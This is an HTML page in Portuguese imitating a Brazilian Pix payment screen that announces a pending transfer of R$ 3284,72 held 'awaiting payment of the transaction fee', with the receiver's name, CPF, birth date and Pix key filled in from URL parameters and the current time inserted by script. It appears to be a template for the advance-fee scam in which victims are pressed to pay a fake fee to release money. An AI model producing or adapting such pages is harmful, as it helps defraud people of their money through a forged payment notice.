<html lang="pt-br"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Pagamento Pendente</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            margin: 0;
            padding: 0;
            background-color: #eaeaea;
        }

        .container {
            width: 365px;
            height: 660px;
            padding: 0px 0px 0px 0px;
            background-color: #fff;
            overflow: hidden;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        .header {
            background-image: url('images/header.png');
            background-size: cover;
            background-repeat: no-repeat;
            color: white;
            padding: 60px;
        }

        .value-date-container {
            background-color: #fff;
            border-radius: 8px;
            padding: 15px;
            margin: -30px 20px 15px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            display: flex;
            justify-content: space-between;
            align-items: center;
            position: relative;
        }

        .value-date {
            text-align: left;
            position: relative;
            padding: 0 10px;
            z-index: 1;
        }

        .value-date
            label {
            font-size: 17px;
            color: #666;
            font-weight: bold;
        }

        .value-date
            p {
            font-size: 21px; /* Increased font-size for better match */
            color: #1178d3;
            font-weight: 800; /* Make the value bold */
            margin: 2px 0px 0px 0px;
        }

        .status-alert {
            background-color: #f7f7f7;
            color: #333;
            text-align: left;
            padding: 20px 20px;
            font-weight: bold;
            margin: 0 20px;
            border-radius: 4px;
            display: flex;
            align-items: center;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }

        .status-alert
            img {
            height: 45px;
            margin-right: 19px;
        }

        .status-text {
            color: #ff635f;
            font-size: 18px;
        }

        .status-text
            strong {
            font-weight: bold;
            color: #d9534f;
            margin-bottom: 5px;
        }

        .receiver-info {
            padding: 20px;
            background-color: #f7f7f7;
            border-radius: 4px;
            margin: 15px 20px 20px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }

        .receiver-info
            h2 {
            font-size: 18px;
            color: #333;
            margin-bottom: 10px;
            font-weight: bold;
        }

        .receiver-info
            label {
            font-size: 16px;
            color: #666;
            font-weight: bold;
            display: block;
            margin-bottom: 5px;
        }

        .receiver-info
            p {
            font-size: 18px;
            color: #333;
            margin: 5px 0px 10px 0px;
            font-weight: bold;
        }
        .receiver-info
            p {
            font-size: 18px;
            color: #333;
            margin: 5px 0px 10px 0px;
            font-weight: bold;
        }
    </style>
</head>
<body>
    <div class="container" style="
    transform: scale(0.78);
    margin: -60px 0px 0px -30px;
">
        <div class="header" style="border-radius: 10px;">
        </div>
        <div class="value-date-container">
            <div class="value-date">
                <label>Valor</label>
                <p>R$ 3284,72</p>
            </div>
            <div class="value-date" style="
    text-align: center;
">
                <label style="">Data</label>
                <p style="
    margin: 1px 0px -4px 0px;
"><span style="
    font-size: 20px;
    font-weight: 800;
">24/03/2025</span><br><span style="
    font-size: 21px;
    font-weight: 500;
">00:36:24</span></p>
            </div>
        </div>
        <div class="status-alert">
            <img src="images/erro.png" alt="Erro">
            <div class="status-text" style="
    font-size: 18px;
    font-weight: 100;
">
                <strong style="
    font-size: 20px;
    color: red;
">PIX Pendente!</strong><br>
                Aguardando Pagamento da Tarifa Transacional...
            </div>
        </div>
        <div class="receiver-info">
            <h2>Dados do Recebedor:</h2>
            <label>Nome</label>
            <p id="nome"></p>
            <label>CPF</label>
            <p id="cpf"></p>
            <label>Data de Nascimento</label>
            <p id="nasc"></p>
            <label>Chave Pix:</label>
            <p id="pix"></p>
        </div>
    </div>
    <script>
        // Função para obter os parâmetros da URL
        function getQueryParams() {
            var params = {};
            var parser = document.createElement('a');
            parser.href = window.location.href;
            var query = parser.search.substring(1);
            var vars = query.split('&');
            for (var i = 0; i < vars.length; i++) {
                var pair = vars[i].split('=');
                params[pair[0]] = decodeURIComponent(pair[1]);
            }
            return params;
        }
    
        // Função para atualizar a data e a hora
        function updateDateTime() {
            var now = new Date();
            var options = {
                day: '2-digit', 
                month: '2-digit', 
                year: 'numeric', 
                hour: '2-digit', 
                minute: '2-digit', 
                second: '2-digit', 
                hour12: false, 
                timeZone: 'America/Sao_Paulo'
            };
            var dateTimeString = now.toLocaleString('pt-BR', options).replace(',', ''); // Remove a vírgula
            var [date, time] = dateTimeString.split(' ');
            document.querySelector('.value-date span:first-child').textContent = date.trim(); // Remove espaços em branco extras
            document.querySelector('.value-date span:last-child').textContent = time;
        }
    
        // Configura os parâmetros da URL nos campos
        window.onload = function() {
            var queryParams = getQueryParams();
            if (queryParams.nome) {
                document.getElementById('nome').textContent = queryParams.nome;
            }
            if (queryParams.cpf) {
                document.getElementById('cpf').textContent = queryParams.cpf;
            }
            if (queryParams.nasc) {
                document.getElementById('nasc').textContent = queryParams.nasc;
            }
            if (queryParams.pix) {
                document.getElementById('pix').textContent = queryParams.pix;
            }
            // Atualiza a data e a hora ao carregar a página
            updateDateTime();
        };
    </script>
    


</body></html>
